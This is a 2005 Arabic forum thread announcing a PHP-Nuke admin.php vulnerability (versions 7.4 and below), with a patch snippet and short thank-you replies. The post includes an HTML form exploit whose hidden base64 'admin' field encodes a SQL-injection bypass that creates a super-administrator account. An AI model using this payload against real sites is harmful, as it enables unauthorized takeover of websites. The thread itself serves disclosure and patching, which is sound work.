🏠 الرئيسية 📜 القوانين 🔒 الخصوصية ✉️ اتصل بنا 🗂️ الأرشيف 📡 RSS
جميع المرفقات اللتي يوجد بها رابط kwety.com أرجو تحويله الى kwety.net

العودة   منتدى الشبكة الكويتية > قســـــ تطوير المواقع ـــــــــم > تطوير المواقع

تطوير المواقع سكربتات :: واجهات :: برامج مواقع

 
أدوات الموضوع
  #1  
قديم 28-01-2005, 07:15 AM
الصورة الرمزية VIP
VIP VIP غير متصل

AdminiStrator

 
📋 بيانات العضو
🗓️ التسجيل : Oct 2004
🔢 رقم العضوية : 3
🌏 البلد : الكويت
💬 المشاركات : 9,252
📊 المعدل : 1.17 / يوم
🥇 النقاط : 300
ثغرة النيوك , مع سد الثغرة ...

ثغرة النيوك الجديده , مع الترقيع !
السلام عليكم ورحمة الله وبركاته



الثغرة في ملف : Admin.php

وهي عبارة عن استثمار .. لخطاء برمجي بالملف ,,

يمّكن المخترق من الحصول على حساب ادامن في مجلة النيوك ,,

الاصدارات المصابة : 7.4 وما تحتها من اصدارات ,

وهذا جزء من الكود الاستثماري للثغرة طبعا كود html:

كود:
NOME: 
    <input type="text" 
name="add_name"> 
    <br> 
    PASSWORD: 

    <input type="text" 
name="add_pwd"> 
    <br> 
    E-MAIL: 
    <input type="text" 
name="add_email"> 
    <br> 
    <input type="hidden" 
name="admin" 
value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> 
    <br> 
    <input type="hidden" 
name="add_radminsuper" value="1"> 
    <br> 
    <input type="hidden" 
name="op" 
value="AddAuthor"> 
  </p> 
  <p> 
    <input type="submit" 
name="Submit" 
value="Create 
Admin"> 
    <br> 
  </p> 
</form>
الترقيع الصحيح :

قم باضافة هذة السطور الى ملف admin.php

كود:
if ( !empty($HTTP_GET_VARS['op']) ) 
{ 
$op = $HTTP_GET_VARS['op']; 
} 

if ( !empty($HTTP_POST_VARS['op']) ) 
{ 
$op = $HTTP_POST_VARS['op']; 
}
مع التحية اخواني اصحاب المواقع

 

 

👍 | 👎 0
توقيع : VIP

قديم 29-01-2005, 09:37 AM   رقم المشاركة : 2
برق
عضو مشارك
 
الصورة الرمزية برق





برق غير متصل

برق كاتب جديد


افتراضي

مشكور اخوي بصراحه معلومه مهمه لاصحاب المواقع المبتدئين







قديم 01-02-2005, 04:43 AM   رقم المشاركة : 3
VIP

AdminiStrator

 
الصورة الرمزية VIP






VIP غير متصل

VIP كاتب مميزVIP كاتب مميزVIP كاتب مميزVIP كاتب مميز


افتراضي

العفو طال عمرك







التوقيع

قديم 10-02-2005, 09:47 AM   رقم المشاركة : 4
برق
عضو مشارك
 
الصورة الرمزية برق





برق غير متصل

برق كاتب جديد


افتراضي

مشكور اخوي على هل شرح الممتاز







ثغرة النيوك , مع سد الثغرة ...



الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه للموضوع : ثغرة النيوك , مع سد الثغرة ...
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
دخول المنتدى فى مجله النيوك kwety تطوير المواقع 4 14-09-2006 12:52 AM
طريقة حماية ايميلك من الثغرة القاتلة الجديدة بالهوتميل . VIP منتدى الحماية و الهاكرز 4 10-08-2006 02:47 PM
ثغرة قاتله في النيوك VIP تطوير المواقع 1 27-11-2005 10:31 PM
الثغرة متواجده في المراكز التحميل VIP قسم ثغرات النسخه الثالثه 0 09-10-2005 04:08 AM
تعلم كيف تعرب ثيم النيوك؟ VIP تطوير المواقع 0 19-01-2005 08:42 AM

الساعة الآن 03:55 PM
جميع الحقوق محفوظة لـ الشبكة الكويتية

التعليقات المنشورة لا تعبر عن رأي الشبكة الكويتية ولا نتحمل أي مسؤولية قانونية حيال ذلك ويتحمل كاتبها مسؤولية النشر